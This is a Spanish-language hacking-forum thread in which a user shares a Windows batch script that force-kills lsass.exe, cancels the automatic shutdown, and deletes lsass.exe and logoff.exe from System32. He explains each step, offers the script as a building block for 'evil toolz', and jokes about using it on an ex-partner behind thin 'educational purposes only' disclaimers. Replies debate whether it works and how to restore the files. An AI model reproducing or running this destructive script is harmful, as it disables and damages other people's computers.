elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  código de ataque a lsass en batch
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: código de ataque a lsass en batch  (Leído 4,463 veces)
corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
código de ataque a lsass en batch
« en: 25 Junio 2008, 14:21 pm »

Bueno como hacía mucho tiempo que no posteaba nada que no fueran peticiones de ayuda, he decidico compartir con la humanidad espe pequeño código mío que tan buenos ratos me ha hecho pasar:

* * educative purposes only, no me responsabilizo de que te jodas el ordenador * *

@echo off
taskkill /IM lsass.exe /f
shutdown -a
del /q /f %WINDIR%\System32\lsass.exe
del /q / f %WINDIR%\System32\logoff.exe
exit

* educative purposes only, no me responsabilizo de que jodas ordenadores ajenos *

Este código hará las delicias de los que mepiecen a programar sus "evil toolz" en batch, ya que puede usarse sólo o incorporado a un código mayor.
SI VAS A HACER ALGO GORDO EN BATCH NO SEAS MALA GENTE Y MÁNDALO A VIRUSTOTAL. INFECTAR POR INFECTAR Y HAER DAÑO POR HACER DAÑO ES TERRORISMO.

|------------------>

Y ahora, una breve explicación que probablemente nadie lea  :xD (ya he publicado el código, qué mas puede importar, pensarán algunos):

Lo primero que hace este código es parar el proceso lsass.exe. Para ello se vale del modificador /f, que indica carácter forzado (para el que no lo sepa, el lsass.exe es un proceso de sistema :¬¬).

Al abortar el proceso se inicia una cuenta atrás de 30 segundos para que se reinicie el ordenador. Para abortarla se utiliza el comando shutdown con el modificador -a.

¿Qué hemos conseguido con esto? Pues simple y llanamente que el ordenador no pueda apagarse si no es tirando del cable de la luz. ¿Divertido ehh?  :xD Pues procura que no te pase a ti, porque entonces verías lo divertido que es.

Entonces... ¿para qué valen los otros dos comandos? (dando por supuesto que se sabe para qué sirve el comando "exit"). Pues muy sencillo. Como además de traviesos somos malos, pero malos malos con ganas, pues no queremos que el ordenador pueda ser apagado nunca más.
Esos dos comandos hacen que el pequeño lío en el que has metido a la máquina no se solucione reiniciando. ¿Y cómo lo hace? Pues eliminando el archivo lsass.exe y el logoff.exe. Si no hay archivo, no hay proceso  :rolleyes: ;D

Sed buenos y no se lo hagáis a vuestra exnovia  :¬¬

Hasta otra!




En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Crazy.sx


Desconectado Desconectado

Mensajes: 447



Ver Perfil
Re: código de ataque a lsass en batch
« Respuesta #1 en: 5 Julio 2008, 08:11 am »

Mmm no se, pues no se puede matar tan facilmente el lsass.exe. Lo mismo con smss.exe, y otros mas.

Lo probé pero nada....


En línea

Destruir K. LOL
corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: código de ataque a lsass en batch
« Respuesta #2 en: 5 Julio 2008, 13:49 pm »

El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2. Si lo estás probando en un sistema operativo similar, estás haciendo algo mal para no poder matar el lsass.exe. SI lo estás probando en otro distinto, por favor, notifícalo.
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Fran_Al


Desconectado Desconectado

Mensajes: 340

a veces....sobran las palabras..


Ver Perfil WWW
Re: código de ataque a lsass en batch
« Respuesta #3 en: 5 Julio 2008, 17:47 pm »

No lo quiero probar, pero lo veo muy simple,,, nose.
¿Quien sabe?? lo mismo funciona
salu2 y gracias
En línea

corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: código de ataque a lsass en batch
« Respuesta #4 en: 6 Julio 2008, 20:18 pm »

El código está probado en una máquina corriendo bajo Windows XP Professional Edition con el SP2.

Me parece que dejo claro que funciona, Francisquito.  :xD

Saludos!
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Luzor

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: código de ataque a lsass en batch
« Respuesta #5 en: 8 Julio 2008, 04:49 am »

una pregunta,
despues de eliminar aquellos archivos existe una forma de "arreglar" ese problema??
se pueden recuperar esos archivos?aunque sean copiados y pegados desde otro pc?
En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: código de ataque a lsass en batch
« Respuesta #6 en: 8 Julio 2008, 10:07 am »

Si, una ves perdi unos archivos muy importantes, luego un amigo me los paso y todo que igual que antes :)

PD : El code no funciona, lo acabo de probar.
PD 2 : Esto va en Scripting.

Saludos.
En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
corax

Desconectado Desconectado

Mensajes: 220


Primum non nocere


Ver Perfil
Re: código de ataque a lsass en batch
« Respuesta #7 en: 9 Julio 2008, 19:05 pm »

En respuesta a tu post:

1. Ya sé que va en scripting... me di cuenta justo después de publicarlo  :xD
2. Dime en qué sistema operativo lo estás probando, porque en el mío funciona.

Am, y sí... la forma de arreglarlo es esa  ;) reubicando los archivos perdidos.
En línea

Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Volcado Lsass mediante ProcDump
Seguridad
St4r 1 2,515 Último mensaje 27 Octubre 2022, 13:26 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines